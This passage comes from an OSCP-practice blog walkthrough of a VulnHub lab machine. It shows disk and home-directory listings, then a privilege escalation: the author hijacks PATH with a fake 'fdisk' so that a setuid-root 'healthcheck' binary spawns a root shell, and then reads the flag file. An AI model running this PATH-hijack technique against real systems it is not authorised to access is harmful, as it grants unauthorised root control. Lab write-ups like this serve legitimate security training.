Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *          63    18876374     9438156   83  Linux
/dev/sda2        18876375    20964824     1044225    5  Extended
/dev/sda5        18876438    20964824     1044193+  82  Linux swap / Solaris
4.0K    ./Movies
156K    ./.fontconfig
4.0K    ./.gnome2_private
32K     ./.gnome2/accels
12K     ./.gnome2/panel2.d/default/launchers
16K     ./.gnome2/panel2.d/default
20K     ./.gnome2/panel2.d
4.0K    ./.gnome2/evince
8.0K    ./.gnome2/gedit
4.0K    ./.gnome2/file-roller
4.0K    ./.gnome2/nautilus-scripts
12K     ./.gnome2/keyrings
92K     ./.gnome2
4.0K    ./.gnupg/private-keys-v1.d
12K     ./.gnupg
4.0K    ./.themes
8.0K    ./.local/share/parcellite
4.0K    ./.local/share/desktop-directories
216K    ./.local/share/gvfs-metadata
20K     ./.local/share/applications
260K    ./.local/share
264K    ./.local
4.0K    ./.config/enchant
4.0K    ./.config/gnome-session/saved-session
8.0K    ./.config/gnome-session
8.0K    ./.config/bleachbit
4.0K    ./.config/google-googletalkplugin
4.0K    ./.config/parcellite
12K     ./.config/menus
4.0K    ./.config/autostart
4.0K    ./.config/chromium/Default/User StyleSheets
8.0K    ./.config/chromium/Default/Local Storage
528K    ./.config/chromium/Default
552K    ./.config/chromium
8.0K    ./.config/gtk-2.0
616K    ./.config
20K     ./Desktop
4.0K    ./.mysqlgui/administrator
20K     ./.mysqlgui
8.0K    ./.dbus/session-bus
12K     ./.dbus
4.0K    ./Templates
4.0K    ./.macromedia/Flash_Player/#SharedObjects
8.0K    ./.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys
12K     ./.macromedia/Flash_Player/macromedia.com/support/flashplayer
16K     ./.macromedia/Flash_Player/macromedia.com/support
20K     ./.macromedia/Flash_Player/macromedia.com
28K     ./.macromedia/Flash_Player
32K     ./.macromedia
4.0K    ./.nautilus
164K    ./.thumbnails/normal
168K    ./.thumbnails
148K    ./.pulse
12K     ./tmp/orbit-medical
4.0K    ./tmp/keyring-hSBjUb
4.0K    ./tmp/orbit-root
8.0K    ./tmp/pulse-8LagrogWihJO
4.0K    ./tmp/ssh-XLjWYherh886
4.0K    ./tmp/keyring-fPbG5t
4.0K    ./tmp/ssh-RoIgQkNbu874
44K     ./tmp
6.1M    ./.cache/chromium/Default/Cache
6.1M    ./.cache/chromium/Default
6.1M    ./.cache/chromium
6.2M    ./.cache
4.0K    ./.mozilla/extensions
408K    ./.mozilla/firefox/ph4556ft.default/startupCache
12K     ./.mozilla/firefox/ph4556ft.default/bookmarkbackups
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/9
212K    ./.mozilla/firefox/ph4556ft.default/Cache/F/87
216K    ./.mozilla/firefox/ph4556ft.default/Cache/F
40K     ./.mozilla/firefox/ph4556ft.default/Cache/4/15
44K     ./.mozilla/firefox/ph4556ft.default/Cache/4
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/8
80K     ./.mozilla/firefox/ph4556ft.default/Cache/0/32
28K     ./.mozilla/firefox/ph4556ft.default/Cache/0/38
112K    ./.mozilla/firefox/ph4556ft.default/Cache/0
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/D
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/6
28K     ./.mozilla/firefox/ph4556ft.default/Cache/1/99
32K     ./.mozilla/firefox/ph4556ft.default/Cache/1
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/B
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/C
80K     ./.mozilla/firefox/ph4556ft.default/Cache/5/69
84K     ./.mozilla/firefox/ph4556ft.default/Cache/5
40K     ./.mozilla/firefox/ph4556ft.default/Cache/E/9C
44K     ./.mozilla/firefox/ph4556ft.default/Cache/E
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/A
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/2
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/3
4.0K    ./.mozilla/firefox/ph4556ft.default/Cache/7
660K    ./.mozilla/firefox/ph4556ft.default/Cache

 

4.0K    ./.mozilla/firefox/ph4556ft.default/minidumps
29M     ./.mozilla/firefox/ph4556ft.default
8.0K    ./.mozilla/firefox/Crash Reports
29M     ./.mozilla/firefox
29M     ./.mozilla
44K     ./Documents
8.0K    ./.gconf/apps/gconf-editor
8.0K    ./.gconf/apps/metacity/general
12K     ./.gconf/apps/metacity
8.0K    ./.gconf/apps/gnome-terminal/profiles/Default
12K     ./.gconf/apps/gnome-terminal/profiles
8.0K    ./.gconf/apps/gnome-terminal/global
24K     ./.gconf/apps/gnome-terminal
8.0K    ./.gconf/apps/gksu
8.0K    ./.gconf/apps/gedit-2/preferences/ui/statusbar
12K     ./.gconf/apps/gedit-2/preferences/ui
16K     ./.gconf/apps/gedit-2/preferences
20K     ./.gconf/apps/gedit-2
8.0K    ./.gconf/apps/nautilus-open-terminal
8.0K    ./.gconf/apps/nautilus/desktop
8.0K    ./.gconf/apps/nautilus/preferences
8.0K    ./.gconf/apps/nautilus/desktop-metadata/8@46@0@32@GB@32@Media@46@volume
8.0K    ./.gconf/apps/nautilus/desktop-metadata/trash
8.0K    ./.gconf/apps/nautilus/desktop-metadata/8GB@46@volume
8.0K    ./.gconf/apps/nautilus/desktop-metadata/pcedu-en@46@volume
8.0K    ./.gconf/apps/nautilus/desktop-metadata/home
8.0K    ./.gconf/apps/nautilus/desktop-metadata/directory
8.0K    ./.gconf/apps/nautilus/desktop-metadata/computer
60K     ./.gconf/apps/nautilus/desktop-metadata
8.0K    ./.gconf/apps/nautilus/list_view
88K     ./.gconf/apps/nautilus
8.0K    ./.gconf/apps/panel/toplevels/top_panel/background
16K     ./.gconf/apps/panel/toplevels/top_panel
20K     ./.gconf/apps/panel/toplevels
8.0K    ./.gconf/apps/panel/general
8.0K    ./.gconf/apps/panel/applets/applet_2/prefs
16K     ./.gconf/apps/panel/applets/applet_2
8.0K    ./.gconf/apps/panel/applets/applet_6/prefs
16K     ./.gconf/apps/panel/applets/applet_6
8.0K    ./.gconf/apps/panel/applets/applet_3/prefs
16K     ./.gconf/apps/panel/applets/applet_3
8.0K    ./.gconf/apps/panel/applets/applet_4/prefs
16K     ./.gconf/apps/panel/applets/applet_4
8.0K    ./.gconf/apps/panel/applets/applet_5
8.0K    ./.gconf/apps/panel/applets/window_menu
8.0K    ./.gconf/apps/panel/applets/clock/prefs
12K     ./.gconf/apps/panel/applets/clock
8.0K    ./.gconf/apps/panel/applets/applet_1/prefs
16K     ./.gconf/apps/panel/applets/applet_1
8.0K    ./.gconf/apps/panel/applets/notification_area
8.0K    ./.gconf/apps/panel/applets/applet_0/prefs
16K     ./.gconf/apps/panel/applets/applet_0
136K    ./.gconf/apps/panel/applets
8.0K    ./.gconf/apps/panel/objects/object_0
8.0K    ./.gconf/apps/panel/objects/object_2
8.0K    ./.gconf/apps/panel/objects/object_3
8.0K    ./.gconf/apps/panel/objects/object_4
8.0K    ./.gconf/apps/panel/objects/browser_launcher
8.0K    ./.gconf/apps/panel/objects/object_1
52K     ./.gconf/apps/panel/objects
220K    ./.gconf/apps/panel
392K    ./.gconf/apps
8.0K    ./.gconf/desktop/gnome/sound
8.0K    ./.gconf/desktop/gnome/file_views
8.0K    ./.gconf/desktop/gnome/background
8.0K    ./.gconf/desktop/gnome/interface
8.0K    ./.gconf/desktop/gnome/accessibility/keyboard
12K     ./.gconf/desktop/gnome/accessibility
8.0K    ./.gconf/desktop/gnome/url-handlers/mailto
8.0K    ./.gconf/desktop/gnome/url-handlers/http
8.0K    ./.gconf/desktop/gnome/url-handlers/chrome
8.0K    ./.gconf/desktop/gnome/url-handlers/ftp
8.0K    ./.gconf/desktop/gnome/url-handlers/https
44K     ./.gconf/desktop/gnome/url-handlers
8.0K    ./.gconf/desktop/gnome/peripherals/mouse
12K     ./.gconf/desktop/gnome/peripherals
104K    ./.gconf/desktop/gnome
108K    ./.gconf/desktop
504K    ./.gconf
4.0K    ./Music
32K     ./.pki/nssdb
36K     ./.pki
4.0K    ./.icons
68K     ./.gconfd
4.0K    ./Videos
34M     ./Downloads
4.0K    ./.adobe/Flash_Player/AssetCache/9PFREZ9W
8.0K    ./.adobe/Flash_Player/AssetCache
12K     ./.adobe/Flash_Player
16K     ./.adobe
344K    ./Pictures
71M     .

[medical@localhost ~]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; slee 2 ; ifconfig ; fdisk -l ; du -h
[medical@localhost ~]$ 

 


 

 

5. PRIVILEGE ESCALATION

 

[medical@localhost ~]$ ls -l /usr/bin/healthcheck
ls -l /usr/bin/healthcheck
-rwsr-sr-x 1 root root 5813 Jul 29  2020 /usr/bin/healthcheck*
[medical@localhost ~]$ locate fdisk
locate fdisk
/sbin/fdisk
/sbin/sfdisk
/usr/bin/fdisk

/usr/sbin/cfdisk
/usr/share/man/fr/man8/cfdisk.8.bz2
/usr/share/man/man8/cfdisk.8.bz2
/usr/share/man/man8/fdisk.8.bz2
/usr/share/man/man8/sfdisk.8.bz2
[medical@localhost ~]$

[medical@localhost ~]$ cd /tmp

cd /tmp
[medical@localhost tmp]$ 
[medical@localhost tmp]$ echo "/bin/bash" > fdisk
echo "/bin/bash" > fdisk
[medical@localhost tmp]$ chmod 777 fdisk

chmod 777 fdisk
[medical@localhost tmp]$ 
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ echo $PATH
echo $PATH
/tmp:/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin
[medical@localhost tmp]$ /usr/bin/healthcheck

/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System

eth1      Link encap:Ethernet  HWaddr 08:00:27:F6:FD:1B  
          inet addr:192.168.10.48  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fef6:fd1b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1485 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1782 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:164305 (160.4 KiB)  TX bytes:2263585 (2.1 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

[root@localhost tmp]# 
[root@localhost tmp]# id
id
uid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),500(medical),501(fuse)
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls
ls
Desktop/    drakx/        healthcheck.c  sudo.rpm
Documents/  healthcheck*  root.txt       tmp/
[root@localhost root]# cat root.txt
cat root.txt
██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██ 
 ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██ 
   ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██    
   ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██ 
                                                                                                                          
                                                                                                                          
Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
 
[root@localhost root]# 

 

 

 

728x90

'OSCP > Vulnahub' 카테고리의 다른 글

32. Glasgow Smile  (0) 2021.04.14
31. Photographer  (0) 2021.04.14
29. Tiki  (0) 2021.04.13
28. Lord of the Root  (0) 2021.04.12
27. Pinky's Palace (BOF)* 중요!~  (0) 2021.04.11

+ Recent posts